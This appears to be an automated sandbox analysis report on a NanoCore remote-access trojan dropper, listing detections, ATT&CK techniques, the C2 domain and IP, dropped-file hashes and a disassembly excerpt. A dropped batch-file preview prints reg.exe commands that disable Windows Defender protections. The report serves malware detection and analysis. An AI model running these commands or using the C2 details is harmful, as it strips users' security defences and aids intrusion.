          Source: Yara match | File source: 00000010.00000000.357721819.0000000000C62000.00000002.00020000.sdmp, type: MEMORY
          Source: Yara match | File source: Process Memory Space: Service.exe PID: 6520, type: MEMORY
          Source: Yara match | File source: Process Memory Space: dhcpmon.exe PID: 7056, type: MEMORY
          Source: Yara match | File source: C:\Users\user\Desktop\Service.exe, type: DROPPED
          Source: Yara match | File source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe, type: DROPPED
          Source: Yara match | File source: 2.2.Service.exe.41d2a15.5.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 16.0.dhcpmon.exe.c60000.0.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 2.2.Service.exe.5844629.10.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 2.2.Service.exe.41ce3ec.4.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 2.0.Service.exe.900000.0.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 2.2.Service.exe.41ce3ec.4.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 16.2.dhcpmon.exe.c60000.0.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 16.2.dhcpmon.exe.4472a15.4.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 2.2.Service.exe.5840000.9.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 16.2.dhcpmon.exe.44695b6.3.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 16.2.dhcpmon.exe.446e3ec.5.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 2.2.Service.exe.5840000.9.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 2.2.Service.exe.41c95b6.3.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 2.2.Service.exe.900000.0.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 16.2.dhcpmon.exe.446e3ec.5.raw.unpack, type: UNPACKEDPE
          Source: C:\Users\user\Desktop\Service.exe | Code function: 2_2_02E025F2 bind,
          Source: C:\Users\user\Desktop\Service.exe | Code function: 2_2_02E025A0 bind,

          Mitre Att&ck Matrix

          Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact
          Valid Accounts | Scripting1 | DLL Side-Loading1 | DLL Side-Loading1 | Disable or Modify Tools1 | Input Capture21 | System Time Discovery1 | Remote Services | Archive Collected Data11 | Exfiltration Over Other Network Medium | Encrypted Channel1 | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Modify System Partition
          Default Accounts | Native API1 | Boot or Logon Initialization Scripts | Access Token Manipulation1 | Deobfuscate/Decode Files or Information11 | LSASS Memory | File and Directory Discovery3 | Remote Desktop Protocol | Input Capture21 | Exfiltration Over Bluetooth | Non-Standard Port1 | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout
          Domain Accounts | Command and Scripting Interpreter12 | Logon Script (Windows) | Process Injection12 | Scripting1 | Security Account Manager | System Information Discovery35 | SMB/Windows Admin Shares | Data from Network Shared Drive | Automated Exfiltration | Remote Access Software1 | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data
          Local Accounts | At (Windows) | Logon Script (Mac) | Logon Script (Mac) | Obfuscated Files or Information2 | NTDS | Query Registry1 | Distributed Component Object Model | Input Capture | Scheduled Transfer | Non-Application Layer Protocol1 | SIM Card Swap | | Carrier Billing Fraud
          Cloud Accounts | Cron | Network Logon Script | Network Logon Script | Software Packing13 | LSA Secrets | Security Software Discovery131 | SSH | Keylogging | Data Transfer Size Limits | Application Layer Protocol21 | Manipulate Device Communication | | Manipulate App Store Rankings or Ratings
          Replication Through Removable Media | Launchd | Rc.common | Rc.common | DLL Side-Loading1 | Cached Domain Credentials | Process Discovery2 | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Multiband Communication | Jamming or Denial of Service | | Abuse Accessibility Features
          External Remote Services | Scheduled Task | Startup Items | Startup Items | Masquerading2 | DCSync | Virtualization/Sandbox Evasion31 | Windows Remote Management | Web Portal Capture | Exfiltration Over Alternative Protocol | Commonly Used Port | Rogue Wi-Fi Access Points | | Data Encrypted for Impact
          Drive-by Compromise | Command and Scripting Interpreter | Scheduled Task/Job | Scheduled Task/Job | Modify Registry1 | Proc Filesystem | Application Window Discovery1 | Shared Webroot | Credential API Hooking | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Application Layer Protocol | Downgrade to Insecure Protocols | | Generate Fraudulent Advertising Revenue
          Exploit Public-Facing Application | PowerShell | At (Linux) | At (Linux) | Virtualization/Sandbox Evasion31 | /etc/passwd and /etc/shadow | System Network Connections Discovery | Software Deployment Tools | Data Staged | Exfiltration Over Asymmetric Encrypted Non-C2 Protocol | Web Protocols | Rogue Cellular Base Station | | Data Destruction
          Supply Chain Compromise | AppleScript | At (Windows) | At (Windows) | Access Token Manipulation1 | Network Sniffing | Process Discovery | Taint Shared Content | Local Data Staging | Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol | File Transfer Protocols | | | Data Encrypted for Impact
          Compromise Software Dependencies and Development Tools | Windows Command Shell | Cron | Cron | Process Injection12 | Input Capture | Permission Groups Discovery | Replication Through Removable Media | Remote Data Staging | Exfiltration Over Physical Medium | Mail Protocols | | | Service Stop
          Compromise Software Supply Chain | Unix Shell | Launchd | Launchd | Hidden Files and Directories1 | Keylogging | Local Groups | Component Object Model and Distributed COM | Screen Capture | Exfiltration over USB | DNS | | | Inhibit System Recovery

          Behavior Graph

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet
          Behavior Graph ID: 412429 | Sample: 01d32b29_by_Libranalysis | Startdate: 12/05/2021 | Architecture: WINDOWS | Score: 100

          Start
          • Signatures: Found malware configuration; Malicious sample detected (through community Yara rule); Antivirus detection for dropped file; 10 other signatures
          • 01d32b29_by_Libranalysis.exe 7 started
            • Dropped: C:\Users\user\Desktop\Service.exe, PE32; C:\Users\user\Desktop\Main.exe, PE32+
            • Service.exe 1 10 started
              • DNS/IP: likedoingthis.ddns.net 91.109.188.5, 1337 IELOIELOMainNetworkFR France; 192.168.2.1 unknown unknown
              • Dropped: C:\Program Files (x86)\...\dhcpmon.exe, PE32; C:\Users\user\AppData\Roaming\...\run.dat, International
              • Signatures: Antivirus detection for dropped file; Multi AV Scanner detection for dropped file; Machine Learning detection for dropped file; Hides that the sample has been downloaded from the Internet (zone.identifier)
            • Main.exe 8 started
              • cmd.exe 1 started
                • Signatures: Uses cmd line tools excessively to alter registry or file data
                • reg.exe 1 started
                  • conhost.exe started
                • conhost.exe started
                • reg.exe 1 started
                • 5 other processes started
          • dhcpmon.exe 3 started
            • Dropped: C:\Users\user\AppData\...\dhcpmon.exe.log, ASCII

          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

          Source | Detection | Scanner | Label
          01d32b29_by_Libranalysis.exe | 48% | Virustotal |
          01d32b29_by_Libranalysis.exe | 55% | ReversingLabs | ByteCode-MSIL.Backdoor.NanoCore
          01d32b29_by_Libranalysis.exe | 100% | Joe Sandbox ML |

          Dropped Files

          Source | Detection | Scanner | Label
          C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe | 100% | Avira | TR/Dropper.MSIL.Gen7
          C:\Users\user\Desktop\Service.exe | 100% | Avira | TR/Dropper.MSIL.Gen7
          C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe | 100% | Joe Sandbox ML |
          C:\Users\user\Desktop\Service.exe | 100% | Joe Sandbox ML |
          C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe | 80% | Virustotal |
          C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe | 98% | ReversingLabs | ByteCode-MSIL.Backdoor.NanoCore
          C:\Users\user\Desktop\Main.exe | 32% | ReversingLabs | Win64.PUA.Wacapew
          C:\Users\user\Desktop\Service.exe | 98% | ReversingLabs | ByteCode-MSIL.Backdoor.NanoCore

          Unpacked PE Files

          Source | Detection | Scanner | Label
          16.0.dhcpmon.exe.c60000.0.unpack | 100% | Avira | TR/Dropper.MSIL.Gen7
          2.0.Service.exe.900000.0.unpack | 100% | Avira | TR/Dropper.MSIL.Gen7
          16.2.dhcpmon.exe.c60000.0.unpack | 100% | Avira | TR/Dropper.MSIL.Gen7
          2.2.Service.exe.900000.0.unpack | 100% | Avira | TR/Dropper.MSIL.Gen7
          2.2.Service.exe.5840000.9.unpack | 100% | Avira | TR/NanoCore.fadte

          Domains

          Source | Detection | Scanner | Label
          likedoingthis.ddns.net | 0% | Virustotal |

          URLs

          Source | Detection | Scanner | Label
           | 0% | Avira URL Cloud | safe
          likedoingthis.ddns.net | 0% | Virustotal |
          likedoingthis.ddns.net | 0% | Avira URL Cloud | safe

          Domains and IPs

          Contacted Domains

          Name | IP | Active | Malicious | Antivirus Detection | Reputation
          likedoingthis.ddns.net | 91.109.188.5 | true | true |  | unknown

          Contacted URLs

          Name | Malicious | Antivirus Detection | Reputation
           | true | Avira URL Cloud: safe | low
          likedoingthis.ddns.net | true | 0%, Virustotal; Avira URL Cloud: safe | unknown

          Contacted IPs


          Public

          IP | Domain | Country | ASN | ASN Name | Malicious
          91.109.188.5 | likedoingthis.ddns.net | France | 29075 | IELOIELOMainNetworkFR | true

          Private

          IP
          192.168.2.1

          General Information

          Joe Sandbox Version:32.0.0 Black Diamond
          Analysis ID:412429
          Start date:12.05.2021
          Start time:17:33:17
          Joe Sandbox Product:CloudBasic
          Overall analysis duration:0h 10m 53s
          Hypervisor based Inspection enabled:false
          Report type:light
          Sample file name:01d32b29_by_Libranalysis (renamed file extension from none to exe)
          Cookbook file name:default.jbs
          Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
          Number of new started processes analysed:35
          Number of new started drivers analysed:0
          Number of existing processes analysed:0
          Number of existing drivers analysed:0
          Number of injected processes analysed:0
          Technologies:
          • HCA enabled
          • EGA enabled
          • HDC enabled
          • AMSI enabled
          Analysis Mode:default
          Analysis stop reason:Timeout
          Detection:MAL
          Classification:mal100.troj.evad.winEXE@24/6@8/2
          EGA Information:Failed
          HDC Information:
          • Successful, ratio: 54.2% (good quality ratio 44.3%)
          • Quality average: 62.7%
          • Quality standard deviation: 36.7%
          HCA Information:
          • Successful, ratio: 68%
          • Number of executed functions: 0
          • Number of non-executed functions: 0
          Cookbook Comments:
          • Adjust boot time
          • Enable AMSI
          Warnings:
          • Behavior information exceeds normal sizes, reducing to normal. Report will have missing behavior information.
          • Excluded IPs from analysis (whitelisted): 13.88.21.125, 92.122.145.220, 13.64.90.137, 52.147.198.201, 40.88.32.150, 168.61.161.212, 20.50.102.62, 92.122.213.247, 92.122.213.194, 2.20.142.209, 2.20.143.16, 52.155.217.156, 20.54.26.129, 184.30.24.56
          • Excluded domains from analysis (whitelisted): au.download.windowsupdate.com.edgesuite.net, store-images.s-microsoft.com-c.edgekey.net, a1449.dscg2.akamai.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, arc.msn.com, consumerrp-displaycatalog-aks2eap-europe.md.mp.microsoft.com.akadns.net, db5eap.displaycatalog.md.mp.microsoft.com.akadns.net, e12564.dspb.akamaiedge.net, skypedataprdcoleus15.cloudapp.net, audownload.windowsupdate.nsatc.net, arc.trafficmanager.net, displaycatalog.mp.microsoft.com, watson.telemetry.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net, au-bg-shim.trafficmanager.net, displaycatalog-europeeap.md.mp.microsoft.com.akadns.net, skypedataprdcolwus17.cloudapp.net, fs.microsoft.com, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, ris-prod.trafficmanager.net, skypedataprdcolcus17.cloudapp.net, ctldl.windowsupdate.com, e1723.g.akamaiedge.net, a767.dscg3.akamai.net, iris-de-prod-azsc-uks.uksouth.cloudapp.azure.com, skypedataprdcoleus16.cloudapp.net, ris.api.iris.microsoft.com, store-images.s-microsoft.com, blobcollector.events.data.trafficmanager.net, skypedataprdcolwus15.cloudapp.net, displaycatalog-rp.md.mp.microsoft.com.akadns.net
          • Report size exceeded maximum capacity and may have missing behavior information.
          • Report size getting too big, too many NtOpenKeyEx calls found.
          • Report size getting too big, too many NtProtectVirtualMemory calls found.
          • Report size getting too big, too many NtQueryValueKey calls found.

          Simulations

          Behavior and APIs

          Time | Type | Description
          17:34:11 | API Interceptor | 1045x Sleep call for process: Service.exe modified
          17:34:13 | Autostart | Run: HKLM\Software\Microsoft\Windows\CurrentVersion\Run DHCP Monitor C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe

          Joe Sandbox View / Context

          IPs

          No context

          Domains

          No context

          ASN

          Match: IELOIELOMainNetworkFR

          Associated Sample Name / URL | Detection | Context
          684A5F52ADD55DFB891523AC71E822022DE97AF06BA52.exe | malicious | 141.255.144.80
          tf2j9VpHie.exe | malicious | 91.109.178.9
          SSWgdtO0DX.exe | malicious | 91.109.190.3
          SQ7RDC69M5.exe | malicious | 141.255.152.35
          1YyuQvKv.exe | malicious | 141.255.158.200
          LeG1rd98Ra.exe | malicious | 141.255.156.15
          FzDN7GfLRo.exe | malicious | 141.255.152.120
          CRnc9agoYt.exe | malicious | 141.255.152.141
          OEGVaZRADt.exe | malicious | 141.255.152.155
          6RtJvAEs.exe | malicious | 141.255.147.10
          CTpgkYwhLg.exe | malicious | 91.109.186.13
          ixTrpAt2an.exe | malicious | 141.255.150.137
          yfSMg0NL6F.exe | malicious | 141.255.155.120
          lfLNfqEEOr.exe | malicious | 141.255.155.120
          e2.exe | malicious | 141.255.155.120
          xciwFNwa.exe | malicious | 91.109.188.13
          vizE0jxu.exe | malicious | 91.109.188.13
          EhXUMhhD.exe | malicious | 91.109.188.13
          u3yRz9jL.exe | malicious | 91.109.176.3
          e5QFrSSa.exe | malicious | 91.109.176.3

          JA3 Fingerprints

          No context

          Dropped Files

          No context

          Created / dropped Files

          C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe
          Process:C:\Users\user\Desktop\Service.exe
          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
          Category:dropped
          Size (bytes):207360
          Entropy (8bit):7.449966518902096
          Encrypted:false
          SSDEEP:3072:gzEqV6B1jHa6dtJ10jgvzcgi+oG/j9iaMP2s/HIwv5fUisD1NHmB5n7lnQidogwK:gLV6Bta6dtJmakIM5fjsDM5nZQi+nK
          MD5:A54512682E96BF7475C189E0D85C4B1F
          SHA1:7041CD71EA3E68ACDF4F4BF7A948C59C42B66121
          SHA-256:B3043783DD5D3E129E50CE47CFE69A777FCDF4F79DC093DC5B39BA2BFAEEE609
          SHA-512:8EE2D3771C779349C0965FF959F1A3AA87B3EA5A642BDAF3D907B8B7C4062B88239CCA94BA6BD537A52DF3A8627FB1592C90236E6A0A7449A9B231832FA15C5C
          Malicious:true
          Yara Hits:
          • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe, Author: Florian Roth
          • Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe, Author: Florian Roth
          • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe, Author: Joe Security
          • Rule: NanoCore, Description: unknown, Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe, Author: Kevin Breen <kevin@techanarchy.net>
          Antivirus:
          • Antivirus: Avira, Detection: 100%
          • Antivirus: Joe Sandbox ML, Detection: 100%
          • Antivirus: Virustotal, Detection: 80%, Browse
          • Antivirus: ReversingLabs, Detection: 98%
          Reputation:low
          C:\Users\user\AppData\Local\Microsoft\CLR_v2.0_32\UsageLogs\dhcpmon.exe.log
          Process:C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe
          File Type:ASCII text, with CRLF line terminators
          Category:dropped
          Size (bytes):525
          Entropy (8bit):5.2874233355119316
          Encrypted:false
          SSDEEP:12:Q3LaJU20NaL10U29hJ5g1B0U2ukyrFk70Ug+9Yz9tv:MLF20NaL329hJ5g522rWz2T
          MD5:61CCF53571C9ABA6511D696CB0D32E45
          SHA1:A13A42A20EC14942F52DB20FB16A0A520F8183CE
          SHA-256:3459BDF6C0B7F9D43649ADAAF19BA8D5D133BCBE5EF80CF4B7000DC91E10903B
          SHA-512:90E180D9A681F82C010C326456AC88EBB89256CC769E900BFB4B2DF92E69CA69726863B45DFE4627FC1EE8C281F2AF86A6A1E2EF1710094CCD3F4E092872F06F
          Malicious:true
          Preview: 1,"fusion","GAC",0..3,"C:\Windows\assembly\NativeImages_v2.0.50727_32\System\1ffc437de59fb69ba2b865ffdc98ffd1\System.ni.dll",0..3,"C:\Windows\assembly\NativeImages_v2.0.50727_32\System.Drawing\54d944b3ca0ea1188d700fbd8089726b\System.Drawing.ni.dll",0..3,"C:\Windows\assembly\NativeImages_v2.0.50727_32\System.Windows.Forms\bd8d59c984c9f5f2695f64341115cdf0\System.Windows.Forms.ni.dll",0..3,"C:\Windows\assembly\NativeImages_v2.0.50727_32\Microsoft.VisualBas#\cd7c74fce2a0eab72cd25cbe4bb61614\Microsoft.VisualBasic.ni.dll",0..
          C:\Users\user\AppData\Local\Temp\DFA1.tmp\DFA2.tmp\DFA3.bat
          Process:C:\Users\user\Desktop\Main.exe
          File Type:ASCII text, with CRLF line terminators
          Category:dropped
          Size (bytes):1487
          Entropy (8bit):5.031356173135581
          Encrypted:false
          SSDEEP:24:wwIpB+VMxNcdVbUO4cdVt4cdV7F4cdVbT4cdVbUO4cdVbh0KsA4IBIPGv:4+u6KO46D469F46F46KO46H0KF4IBIP4
          MD5:6ADD1B97023EA11BCFBC2D73966AF51C
          SHA1:52A90BC9480C9FE6C2D03524680D489D6F532472
          SHA-256:98407A93DAD2A0AFC18A428031D61DCA86D19EB8E819C5468DC47AE4AF4B85A4
          SHA-512:E229FC8B25982DAA69CD80EDA1F808E954AA6A116AAB2800C1003497512893A5F0DA5EE489277B29F056C019E0D41ECD0B73236CD8FEAE226A533FD86054F398
          Malicious:false
          Preview: @shift /0..@Echo Off..Title Reg Converter v1.2 & Color 1A..cd %systemroot%\system32..call :IsAdmin....:: --------------------------------------------------- !!! Incorrect Data Found !!! -------------------------------------------------------------..:: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection --> Windows Registry Editor Version 5.00..:: ------------------------------------------------------------------------------------------------------------------------------------------------....Reg.exe add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f..Reg.exe add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f..Reg.exe add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f..Reg.exe add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Pro
          C:\Users\user\AppData\Roaming\D06ED635-68F6-4E9A-955C-4899F5F57B9A\run.dat
          Process:C:\Users\user\Desktop\Service.exe
          File Type:International EBCDIC text, with NEL line terminators
          Category:dropped
          Size (bytes):8
          Entropy (8bit):3.0
          Encrypted:false
          SSDEEP:3:Ftn:Ftn
          MD5:74FC5B26A8043CEF0CBB783D7D271C6A
          SHA1:1AB105E93771E43BF16A9BC60BB9F468B15BD835
          SHA-256:23BB6678DD0E816EE017F308DFBDD6E9351F5C0C1DE07F835865019F9A3EB982
          SHA-512:EA4944A5D479670EFB6B3A8EE0E9AFC16B83D379CFDB4A58FC5CF9C66D9B41E1F7F91BB37F52E480934D3F33A67DCCEA195C2FF3DAD4B4A59905B3C0B02BA273
          Malicious:true
          Preview: [f....H
          C:\Users\user\Desktop\Main.exe
          Process:C:\Users\user\Desktop\01d32b29_by_Libranalysis.exe
          File Type:PE32+ executable (GUI) x86-64, for MS Windows
          Category:dropped
          Size (bytes):123904
          Entropy (8bit):6.468729186726821
          Encrypted:false
          SSDEEP:3072:e2sMWkzbJh1qZ9QW69hd1MMdxPe9N9uA0hu9TBfcXDg3iT:fbJhs7QW69hd1MMdxPe9N9uA0hu9TB2h
          MD5:443089CA423FC51A74E6F64B4A910E04
          SHA1:EF47FAFD569A9938778C94DF431EE851943F1BF3
          SHA-256:BCA1AC632692A480E1544814EDD3C8D148A59D2A89935F6941FE627759EEF135
          SHA-512:7D50E5B3ED25648EE839183164912312C22C2E4FCB6116B1E3E26CC477644BD502BD70065EA684BD7176E605A3CB6A8AB3798724E62A8BC38D7080001FCE880D
          Malicious:true
          Antivirus:
          • Antivirus: ReversingLabs, Detection: 32%
          C:\Users\user\Desktop\Service.exe
          Process:C:\Users\user\Desktop\01d32b29_by_Libranalysis.exe
          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
          Category:dropped
          Size (bytes):207360
          Entropy (8bit):7.449966518902096
          Encrypted:false
          SSDEEP:3072:gzEqV6B1jHa6dtJ10jgvzcgi+oG/j9iaMP2s/HIwv5fUisD1NHmB5n7lnQidogwK:gLV6Bta6dtJmakIM5fjsDM5nZQi+nK
          MD5:A54512682E96BF7475C189E0D85C4B1F
          SHA1:7041CD71EA3E68ACDF4F4BF7A948C59C42B66121
          SHA-256:B3043783DD5D3E129E50CE47CFE69A777FCDF4F79DC093DC5B39BA2BFAEEE609
          SHA-512:8EE2D3771C779349C0965FF959F1A3AA87B3EA5A642BDAF3D907B8B7C4062B88239CCA94BA6BD537A52DF3A8627FB1592C90236E6A0A7449A9B231832FA15C5C
          Malicious:true
          Yara Hits:
          • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: C:\Users\user\Desktop\Service.exe, Author: Florian Roth
          • Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: C:\Users\user\Desktop\Service.exe, Author: Florian Roth
          • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: C:\Users\user\Desktop\Service.exe, Author: Joe Security
          • Rule: NanoCore, Description: unknown, Source: C:\Users\user\Desktop\Service.exe, Author: Kevin Breen <kevin@techanarchy.net>
          Antivirus:
          • Antivirus: Avira, Detection: 100%
          • Antivirus: Joe Sandbox ML, Detection: 100%
          • Antivirus: ReversingLabs, Detection: 98%

          Static File Info

          General

          File type:PE32 executable (GUI) Intel 80386, for MS Windows
          Entropy (8bit):7.408173003288473
          TrID:
          • Win32 Executable (generic) a (10002005/4) 99.96%
          • Generic Win/DOS Executable (2004/3) 0.02%
          • DOS Executable Generic (2002/1) 0.02%
          • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
          File name:01d32b29_by_Libranalysis.exe
          File size:527393
          MD5:01d32b29cf20b16e7dc745f01168bdd5
          SHA1:2603699a808a1ac0a2af21c6496acab3be0aa7c9
          SHA256:e94c70d3dc3ab2496465e73bffc7c5f1bc3963f3ae309a88d5e16d5e54a540ce
          SHA512:4298c76e56d518e4c8f3abffa327c66187052ffbea1c8b00fad25e7c4f99b5729eeda62deea54886e25e751ca2223d92ca109f044d6cf5324229c5c84bc1550d
          SSDEEP:12288:ONpszYhvXWSVJdMaeb2X+t4RJ40JSdICg7XDvrHWbqkAsro0mH:yhvJVJdMf0wfd7IzvrLs80mH

          File Icon

          Icon Hash:d49494d6c88ecec2

          Static PE Info

          General

          Entrypoint:0x41ed60
          Entrypoint Section:.text
          Digitally signed:false
          Imagebase:0x400000
          Subsystem:windows gui
          Image File Characteristics:32BIT_MACHINE, EXECUTABLE_IMAGE
          DLL Characteristics:GUARD_CF, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
          Time Stamp:0x606DC419 [Wed Apr 7 14:39:21 2021 UTC]
          TLS Callbacks:
          CLR (.Net) Version:
          OS Version Major:5
          OS Version Minor:1
          File Version Major:5
          File Version Minor:1
          Subsystem Version Major:5
          Subsystem Version Minor:1
          Import Hash:fcf1390e9ce472c7270447fc5c61a0c1

          Entrypoint Preview

          Instruction
          call 00007F01689B0EA9h
          jmp 00007F01689B088Dh
          cmp ecx, dword ptr [0043E668h]
          jne 00007F01689B0A05h
          ret
          jmp 00007F01689B103Eh
          int3
          int3
          int3
          int3
          int3
          push ebp
          mov ebp, esp
          push esi
          push dword ptr [ebp+08h]
          mov esi, ecx
          call 00007F01689A37A7h
          mov dword ptr [esi], 00435580h
          mov eax, esi
          pop esi
          pop ebp
          retn 0004h
          and dword ptr [ecx+04h], 00000000h
          mov eax, ecx
          and dword ptr [ecx+08h], 00000000h
          mov dword ptr [ecx+04h], 00435588h
          mov dword ptr [ecx], 00435580h
          ret
          int3
          int3
          int3
          int3
          int3
          int3
          int3
          int3
          int3
          int3
          int3
          int3
          int3
          lea eax, dword ptr [ecx+04h]
          mov dword ptr [ecx], 00435568h
          push eax
          call 00007F01689B3BDDh
          pop ecx
          ret
          int3
          int3
          int3
          int3
          int3
          int3
          int3
          int3
          int3
          int3
          int3
          int3
          int3
          int3
          int3
          push ebp
          mov ebp, esp
          push esi
          mov esi, ecx
          lea eax, dword ptr [esi+04h]
          mov dword ptr [esi], 00435568h
          push eax
          call 00007F01689B3BB7h
          test byte ptr [ebp+08h], 00000001h
          pop ecx
          je 00007F01689B0A0Ch
          push 0000000Ch
          push esi
          call 00007F01689AFFBCh
          pop ecx
          pop ecx
          mov eax, esi
          pop esi
          pop ebp
          retn 0004h
          push ebp
          mov ebp, esp
          sub esp, 0Ch
          lea ecx, dword ptr [ebp-0Ch]
          call 00007F01689A3702h
          push 0043B704h
          lea eax, dword ptr [ebp-0Ch]
          push eax
          call 00007F01689B32B6h

          Rich Headers

          Programming Language:
          • [ C ] VS2008 SP1 build 30729
          • [EXP] VS2015 UPD3.1 build 24215
          • [LNK] VS2015 UPD3.1 build 24215
          • [IMP] VS2008 SP1 build 30729
          • [C++] VS2015 UPD3.1 build 24215
          • [RES] VS2015 UPD3 build 24213

          Data Directories

          Name | Virtual Address | Virtual Size | Is in Section
          IMAGE_DIRECTORY_ENTRY_EXPORT | 0x3c820 | 0x34 | .rdata
          IMAGE_DIRECTORY_ENTRY_IMPORT | 0x3c854 | 0x3c | .rdata
          IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x63000 | 0xdfd0 | .rsrc
          IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
          IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
          IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x71000 | 0x2274 | .reloc
          IMAGE_DIRECTORY_ENTRY_DEBUG | 0x3aac0 | 0x54 | .rdata
          IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
          IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
          IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
          IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x35508 | 0x40 | .rdata
          IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
          IMAGE_DIRECTORY_ENTRY_IAT | 0x33000 | 0x260 | .rdata
          IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x3bdc4 | 0x120 | .rdata
          IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
          IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |

          Sections

          Name | Virtual Address | Virtual Size | Raw Size | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
          .text | 0x1000 | 0x3122a | 0x31400 | False | 0.582943369289 | data | 6.7038924647 | IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          .rdata | 0x33000 | 0xa612 | 0xa800 | False | 0.453101748512 | data | 5.22369091894 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
          .data | 0x3e000 | 0x23728 | 0x1000 | False | 0.36767578125 | data | 3.70881866699 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
          .didat | 0x62000 | 0x188 | 0x200 | False | 0.435546875 | data | 3.28777030897 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
          .rsrc | 0x63000 | 0xdfd0 | 0xe000 | False | 0.637032645089 | data | 6.63675064042 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
          .reloc | 0x71000 | 0x2274 | 0x2400 | False | 0.7763671875 | data | 6.55895677973 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

          Resources

          Name | RVA | Size | Type | Language | Country
          PNG | 0x63650 | 0xb45 | PNG image data, 93 x 302, 8-bit/color RGB, non-interlaced | English | United States
          PNG | 0x64198 | 0x15a9 | PNG image data, 186 x 604, 8-bit/color RGB, non-interlaced | English | United States
          RT_ICON | 0x65748 | 0x568 | GLS_BINARY_LSB_FIRST | English | United States
          RT_ICON | 0x65cb0 | 0x8a8 | dBase IV DBT of @.DBF, block length 1024, next free block index 40, next free block 0, next used block 0 | English | United States
